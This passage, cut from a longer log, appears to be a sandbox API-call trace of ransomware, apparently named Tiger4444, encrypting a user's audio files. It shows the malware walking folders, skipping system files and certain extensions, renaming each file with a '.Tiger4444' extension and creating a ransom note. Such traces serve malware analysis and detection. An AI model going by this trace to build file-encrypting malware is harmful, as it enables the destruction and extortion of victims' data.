RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0045.902] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc100, lpName=0x0) returned 0x2c8 [0045.902] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc100) returned 0xbe0000 [0045.904] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.904] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.904] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.904] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.904] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.905] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.905] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.905] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.905] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13735795071) returned 1 [0045.905] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.905] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0045.905] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.906] CloseHandle (hObject=0x2c8) returned 1 [0045.906] CloseHandle (hObject=0x260) returned 1 [0045.909] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\T4BI1N3Y4nE.m4a.Tiger4444") returned 56 [0045.909] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\T4BI1N3Y4nE.m4a" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\t4bi1n3y4ne.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\T4BI1N3Y4nE.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\t4bi1n3y4ne.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.909] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=48640 | out: Addend=0xc6f980) returned 18954720 [0045.909] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=10 | out: Addend=0xc6f98c) returned 4550 [0045.909] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x461aa600, ftCreationTime.dwHighDateTime=0x1d4d4f3, ftLastAccessTime.dwLowDateTime=0xbc3f3090, ftLastAccessTime.dwHighDateTime=0x1d4d371, ftLastWriteTime.dwLowDateTime=0xbc3f3090, ftLastWriteTime.dwHighDateTime=0x1d4d371, nFileSizeHigh=0x0, nFileSizeLow=0xbdff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T4BI1N3Y4nE.m4a", cAlternateFileName="T4BI1N~1.M4A")) returned 0 [0045.909] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.910] lstrcpyW (in: lpString1=0x30aeae6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.910] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.910] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.910] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.911] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.911] CloseHandle (hObject=0x260) returned 1 [0045.911] CloseHandle (hObject=0x2ac) returned 1 [0045.912] GetCurrentThreadId () returned 0xfa8 [0045.912] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0045.913] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M" [0045.913] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0045.913] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0045.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M" [0045.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\" [0045.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\.BFC0E91B00AE8A0620D3" [0045.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.914] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.917] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.918] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.918] CloseHandle (hObject=0x2ac) returned 1 [0045.919] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M") returned 47 [0045.919] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.919] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5808deb0, ftCreationTime.dwHighDateTime=0x1d4d49c, ftLastAccessTime.dwLowDateTime=0x1a9f7620, ftLastAccessTime.dwHighDateTime=0x1d4c66d, ftLastWriteTime.dwLowDateTime=0x80620c8d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.919] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.919] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.919] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.919] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.919] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5808deb0, ftCreationTime.dwHighDateTime=0x1d4d49c, ftLastAccessTime.dwLowDateTime=0x1a9f7620, ftLastAccessTime.dwHighDateTime=0x1d4c66d, ftLastWriteTime.dwLowDateTime=0x80620c8d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.919] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.919] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.919] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.919] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.919] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.919] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80620c8d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80620c8d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80620c8d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.919] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.919] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.919] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a454c0, ftCreationTime.dwHighDateTime=0x1d4d10a, ftLastAccessTime.dwLowDateTime=0x4508330, ftLastAccessTime.dwHighDateTime=0x1d4cb29, ftLastWriteTime.dwLowDateTime=0x4508330, ftLastWriteTime.dwHighDateTime=0x1d4cb29, nFileSizeHigh=0x0, nFileSizeLow=0xf13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1MCgDF7JU.wav", cAlternateFileName="B1MCGD~1.WAV")) returned 1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="Tiger4444.exe") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2=".") returned 1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="..") returned 1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="windows") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="bootmgr") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="pagefile.sys") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="boot") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="ids.txt") returned -1 [0045.919] lstrcmpiW (lpString1="b1MCgDF7JU.wav", lpString2="NTUSER.DAT") returned -1 [0045.919] lstrcpyW (in: lpString1=0x30aeb08, lpString2="b1MCgDF7JU.wav" | out: lpString1="b1MCgDF7JU.wav") returned="b1MCgDF7JU.wav" [0045.919] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\b1MCgDF7JU.wav", dwFileAttributes=0x0) returned 1 [0045.920] lstrlenW (lpString="b1MCgDF7JU.wav") returned 14 [0045.920] lstrlenW (lpString="Tiger4444") returned 9 [0045.920] lstrcmpiW (lpString1="DF7JU.wav", lpString2="Tiger4444") returned -1 [0045.920] lstrlenW (lpString=".dll") returned 4 [0045.920] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.920] lstrlenW (lpString=".lnk") returned 4 [0045.920] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.920] lstrlenW (lpString=".ini") returned 4 [0045.920] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.920] lstrlenW (lpString=".sys") returned 4 [0045.920] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.920] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\b1MCgDF7JU.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\b1mcgdf7ju.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.920] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.920] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13737326121) returned 1 [0045.920] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=61754) returned 1 [0045.920] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.920] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0045.920] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf440, lpName=0x0) returned 0x2c8 [0045.920] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf440) returned 0xbe0000 [0045.922] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.922] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.922] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.922] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.922] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13737528062) returned 1 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.922] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0045.922] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.923] CloseHandle (hObject=0x2c8) returned 1 [0045.923] CloseHandle (hObject=0x260) returned 1 [0045.925] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\b1MCgDF7JU.wav.Tiger4444") returned 72 [0045.925] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\b1MCgDF7JU.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\b1mcgdf7ju.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\b1MCgDF7JU.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\b1mcgdf7ju.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.926] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=61760 | out: Addend=0xc6f980) returned 19003360 [0045.926] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4560 [0045.926] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38fdc00, ftCreationTime.dwHighDateTime=0x1d4d482, ftLastAccessTime.dwLowDateTime=0xfcd588a0, ftLastAccessTime.dwHighDateTime=0x1d4cd74, ftLastWriteTime.dwLowDateTime=0xfcd588a0, ftLastWriteTime.dwHighDateTime=0x1d4cd74, nFileSizeHigh=0x0, nFileSizeLow=0x130fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RZMqfkHjGC7Ywnfi.wav", cAlternateFileName="RZMQFK~1.WAV")) returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="Tiger4444.exe") returned -1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2=".") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="..") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="windows") returned -1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="bootmgr") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="pagefile.sys") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="boot") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="ids.txt") returned 1 [0045.926] lstrcmpiW (lpString1="RZMqfkHjGC7Ywnfi.wav", lpString2="NTUSER.DAT") returned 1 [0045.926] lstrcpyW (in: lpString1=0x30aeb08, lpString2="RZMqfkHjGC7Ywnfi.wav" | out: lpString1="RZMqfkHjGC7Ywnfi.wav") returned="RZMqfkHjGC7Ywnfi.wav" [0045.926] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\RZMqfkHjGC7Ywnfi.wav", dwFileAttributes=0x0) returned 1 [0045.926] lstrlenW (lpString="RZMqfkHjGC7Ywnfi.wav") returned 20 [0045.926] lstrlenW (lpString="Tiger4444") returned 9 [0045.926] lstrcmpiW (lpString1="Ywnfi.wav", lpString2="Tiger4444") returned 1 [0045.926] lstrlenW (lpString=".dll") returned 4 [0045.926] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.926] lstrlenW (lpString=".lnk") returned 4 [0045.926] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.926] lstrlenW (lpString=".ini") returned 4 [0045.926] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.926] lstrlenW (lpString=".sys") returned 4 [0045.926] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\RZMqfkHjGC7Ywnfi.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\rzmqfkhjgc7ywnfi.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.927] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.927] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13737971234) returned 1 [0045.927] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=78075) returned 1 [0045.927] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.927] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.927] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13400, lpName=0x0) returned 0x2c8 [0045.927] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13400) returned 0xbe0000 [0045.928] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.928] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.928] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.928] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.929] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.929] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.929] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.929] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.929] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13738195726) returned 1 [0045.929] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.929] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.929] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.930] CloseHandle (hObject=0x2c8) returned 1 [0045.930] CloseHandle (hObject=0x260) returned 1 [0045.932] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\RZMqfkHjGC7Ywnfi.wav.Tiger4444") returned 78 [0045.932] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\RZMqfkHjGC7Ywnfi.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\rzmqfkhjgc7ywnfi.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\RZMqfkHjGC7Ywnfi.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\rzmqfkhjgc7ywnfi.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.933] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=78080 | out: Addend=0xc6f980) returned 19065120 [0045.933] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4562 [0045.933] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7bc3b0, ftCreationTime.dwHighDateTime=0x1d4d4b4, ftLastAccessTime.dwLowDateTime=0xcecb8b90, ftLastAccessTime.dwHighDateTime=0x1d4d2fa, ftLastWriteTime.dwLowDateTime=0xcecb8b90, ftLastWriteTime.dwHighDateTime=0x1d4d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x2f84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_9r81igxQbjAOcgmhEV.wav", cAlternateFileName="_9R81I~1.WAV")) returned 1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="Tiger4444.exe") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2=".") returned 1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="..") returned 1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="windows") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="bootmgr") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="pagefile.sys") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="boot") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="ids.txt") returned -1 [0045.933] lstrcmpiW (lpString1="_9r81igxQbjAOcgmhEV.wav", lpString2="NTUSER.DAT") returned -1 [0045.933] lstrcpyW (in: lpString1=0x30aeb08, lpString2="_9r81igxQbjAOcgmhEV.wav" | out: lpString1="_9r81igxQbjAOcgmhEV.wav") returned="_9r81igxQbjAOcgmhEV.wav" [0045.933] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\_9r81igxQbjAOcgmhEV.wav", dwFileAttributes=0x0) returned 1 [0045.933] lstrlenW (lpString="_9r81igxQbjAOcgmhEV.wav") returned 23 [0045.933] lstrlenW (lpString="Tiger4444") returned 9 [0045.933] lstrcmpiW (lpString1="gmhEV.wav", lpString2="Tiger4444") returned -1 [0045.933] lstrlenW (lpString=".dll") returned 4 [0045.933] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.934] lstrlenW (lpString=".lnk") returned 4 [0045.934] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.934] lstrlenW (lpString=".ini") returned 4 [0045.934] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.934] lstrlenW (lpString=".sys") returned 4 [0045.934] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\IUdpHuiNoyTnhg6M\\_9r81igxQbjAOcgmhEV.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iudphuinoytnhg6m\\_9r81igxqbjaocgmhev.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.934] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.934] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13738690032) returned 1 [0045.934] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=12164) returned 1 [0045.934] 